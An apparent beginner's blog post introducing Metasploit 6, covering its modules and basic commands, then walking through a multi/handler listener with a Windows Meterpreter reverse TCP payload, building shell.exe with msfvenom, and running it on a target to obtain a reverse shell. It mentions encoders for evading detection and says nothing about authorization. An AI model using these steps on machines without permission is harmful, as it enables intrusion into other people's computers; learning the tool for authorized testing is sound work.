Metasploit Basics For Hackers: Getting Started with Metasploit 6

cyberwarehack
4 min readMay 17, 2021

--

Hey Hello Everyone Welcome to my first blog. Think you will love it.

Introducion

Metasploit

A standardized framework used by security researchers and pen-testers consists of shellcodes in various programming and scripting languages. An unlimited framework developed by H. D. Moore in 2003 as an open-source project. A paid version of Metasploit is also available used by professional pen-testers.

Metasploit is further divided into modules such as.

Payloads

Exploits

Encoders

Auxiliary

Nops

Post

Evasion

Some basic keywords you need to know before getting into it

Payload:- A piece of code that will give you access to the victim's computer which needs to be installed on the target's computer.

Encoder:- A type of encryption to your payload to avoid detection of your payload file.

Exploits:-An exploit executes a sequence of command that targets a specific vulnerability on the targets machine

Reverse shells:- A reverse shell is a type of shell when gets connected to your machine when you execute the payload file on the victim's computer.

Bind shell:-This shell is just opposite to the reverse shell. In this attacker gets connected to the victim's computer when the payload is executed.

Metasploit basic command you need to know

msfconsole “To start metasploit”

msfvenom “To crete your payload file”

help “All command appear”

use “To select a payload,encoder”

set “Used to set lhost and lport”

show options or options “Used to show options based on the selected payload”

Now you know all the basic commands and basic keywords of Metasploit.

Let’s dive more into it.

Now there are many versions of Metasploit the latest is version 6.

Version 6 of Metasploit includes.

  • End-to-end encryption of meterpreter shell.
  • SMB service is improved supports SMB versions 1,2,3.

These were the basic updates for more go:- https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/

Metasploit is a huge framework consist of over 592 payloads and 2074 exploits isn’t it huge it’s a great way to try and run (DIY) to do.

Now I will introduce some of the basic windows exploits present in Metasploit.

And how to get a reverse shell from the payload file.

Now fire up your kali machine and let’s get started. Type “msfconsole” to start the Metasploit framework.

Let’s use an exploit know as

multi/handler

Now type into your Metasploit “use multi/handler"

Now the exploit will be selected. Now that we have selected our exploit let’s set our payload now there are many types of payloads the which we are going to use is “windows/meterpreter/reverse_tcp”

To use this payload type “set payload windows/meterpreter/reverse_tcp”.Now the payload will be set.

Now we have to set our lhost and lport type into your Metasploit “set LHOST {your ip}” now you have set your lhost lets set lport “set LPORT {any port hear}”

If you want to crosscheck your IP address and port number or payload just type “options” in Metasploit.

Now that we have set out lhost,lport, and payload. let's make the payload file that is going to execute on the target's computer with msfvenom.

Msfvenom is a small tool used to create payloads for targets computer.

To use it create a new tab in your terminal and just type msfvenom. It will list out all the attributes to be used. Some of the common attributes used are as:-

-p for payload

-a for arch

-o for output file

-e for encoder

-f for format of the output file

So let's make a payload for windows. So the command will be like

“msfvenom -p your payload hear LHOST={ip} LPORT={your port} -o filename”

Don’t worry about those errors they are like this only.

Now that we have created our payload ”shell.exe”

Now go to your Metasploit tab and type “run” this will create a listener

the showing a message like:-

started reverse tcp handler on 192.168.0.1:4444

Now go to your windows machine and just execute the shell.exe file and boom you just hacked windows.

--

--